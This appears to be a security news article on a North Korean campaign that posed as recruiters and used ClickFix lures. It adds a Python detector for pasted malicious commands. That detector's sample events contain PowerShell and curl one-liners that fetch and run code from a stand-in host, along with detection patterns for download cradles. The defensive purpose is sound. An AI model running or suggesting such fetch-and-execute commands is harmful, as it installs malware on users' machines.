A new campaign by North Korean state-backed hackers has compromised hundreds of professionals by impersonating recruiters on platforms like Slack.
Between March and June 2025, cybersecurity researchers identified a widespread cyber campaign led by North Korean threat actors posing as recruiters or job seekers. The attackers primarily targeted individuals in the blockchain, finance, healthcare, and marketing sectors, with the intent to steal cryptocurrency. SentinelLabs reported that at least 230 victims were identified through exposed server logs, though the actual number is believed to be much higher.
The campaign, dubbed 'Contagious Interview,' is an extension of tactics first seen in 2023 and attributed to the Lazarus Group. It uses social engineering, including fake job offers and phony skill assessments, to trick victims into executing malware, often through a technique known as 'ClickFix,' where fake CAPTCHA tests or error messages prompt users to run malicious scripts.
Once a victim is compromised, the attackers can exfiltrate sensitive data or gain access to digital assets. The infrastructure supporting these operations includes fake recruitment websites, compromised Slack workspaces, and tooling that watches threat-intelligence platforms so the operators learn when their own domains or payloads have been flagged.
SentinelLabs uncovered multiple indicators of poor operational security (OPSEC), including exposed web directories and internal files. These lapses allowed researchers to disrupt portions of the infrastructure and link the campaign to North Korea’s broader efforts to evade sanctions and generate funding through illicit cyber activity.
SentinelLabs stated that North Korean hackers actively monitor Cyber Threat Intelligence (CTI) feeds to evaluate their own risk of detection. Tools like Validin, VirusTotal, and Maltrail were used to monitor flagged infrastructure and identify new targets. Once a domain or malware strain was detected, the threat actors often abandoned the infrastructure and quickly deployed replacements, rather than modifying or hardening existing systems.
Researchers observed coordinated activity through Slack, including bot-based URL sharing among hacker teams. Despite access to advanced tools, the attackers did not apply systematic improvements to their methods, possibly due to revenue quotas and decentralization within the regime’s cyber units.
Roles in blockchain, finance, healthcare, and marketing often involve direct access to crypto wallets or sensitive financial data, which makes the individuals holding them attractive targets for theft and extortion.
ClickFix is a technique where users are tricked into copying and pasting malicious code, often under the guise of fixing a fake error or completing a CAPTCHA test.
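Because ClickFix ends with the victim pasting a command into the Run box or a terminal, the most reliable place to catch it is process-creation telemetry rather than the lure page. The following detector is an added example written for this page, not code from SentinelLabs or from the campaign's tooling; it runs over constructed process events, and the field names, parent-process list, and sample command lines are assumptions chosen for illustration (generic ClickFix shapes, not indicators from the report).

```python
"""Flag ClickFix-style pasted commands in process-creation events.

Added example for this article; the event schema, sample data and the
indicator patterns are assumptions, not indicators from the campaign.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Generic shapes of the one-liner a ClickFix lure asks the user to paste.
# Named so a hit explains itself. Case-insensitive because the Run box is.
PATTERNS = [
    ("hidden-window", re.compile(r"powershell(\.exe)?\s.*-(w|window(style)?)\s*hidden", re.I)),
    ("encoded-command", re.compile(r"powershell(\.exe)?\s.*-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("download-cradle", re.compile(r"powershell(\.exe)?\s.*\b(iwr|invoke-webrequest|invoke-expression|iex)\b", re.I)),
    ("mshta-url", re.compile(r"\bmshta(\.exe)?\s+https?://", re.I)),
    ("curl-pipe-shell", re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b", re.I)),
]

# Parents that mean a human typed or pasted the command (assumed list).
# A CI runner or service host launching PowerShell is a different story.
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe", "terminal", "iterm2", "gnome-terminal"}


@dataclass
class ProcEvent:
    host: str
    parent: str   # image name of the parent process
    cmdline: str  # full command line of the new process


def classify(ev: ProcEvent) -> tuple[bool, list[str]]:
    """Return (suspicious, reasons). Reasons list every matched pattern,
    plus a marker when the parent is an interactive shell or desktop."""
    reasons = [name for name, rx in PATTERNS if rx.search(ev.cmdline)]
    if not reasons:
        return False, []
    if ev.parent.lower() in INTERACTIVE_PARENTS:
        reasons.append(f"interactive-parent:{ev.parent}")
    return True, reasons


def find_clickfix(events: list[ProcEvent]) -> list[tuple[str, list[str]]]:
    """Return (host, reasons) for every event that looks like a pasted ClickFix command."""
    return [(ev.host, reasons) for ev in events if (res := classify(ev))[0] for reasons in [res[1]]]


# Constructed sample events (example.invalid is a reserved name, never resolvable).
SAMPLE_EVENTS = [
    ProcEvent("ws-01", "explorer.exe",
              'powershell.exe -w hidden -c "iwr https://example.invalid/fix | iex"'),
    ProcEvent("ws-02", "explorer.exe", r"notepad.exe C:\Users\dev\notes.txt"),
    ProcEvent("mac-03", "Terminal",
              '/bin/bash -c "curl -fsSL https://example.invalid/setup.sh | bash"'),
    # Legitimate scheduled build: PowerShell, but no hidden window, no cradle, service parent.
    ProcEvent("build-04", "services.exe", r"powershell.exe -NoProfile -File C:\ci\build.ps1"),
]

if __name__ == "__main__":
    for host, reasons in find_clickfix(SAMPLE_EVENTS):
        print(f"{host}: {', '.join(reasons)}")
```

Only the two pasted commands fire; the CI build on build-04 runs PowerShell without any of the lure-specific shapes and stays quiet. In production the interactive-parent marker is what separates a user who followed a fake CAPTCHA from an administrator's own script, so weight it accordingly rather than alerting on every download cradle.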
Hackers use platforms like Validin and VirusTotal to monitor their infrastructure, check if domains are flagged, and adjust operations accordingly.
Due to pressure from revenue quotas, teams prioritize speed and output over long-term stealth, often abandoning old infrastructure rather than updating it.
To reduce the risk, verify the authenticity of job offers through the company's official channels, never run code or download files from unverified sources, and treat as a red flag any recruitment process that deviates from standard practice, such as a "skill assessment" or "fix" that requires pasting a command or running a downloaded project before an interview.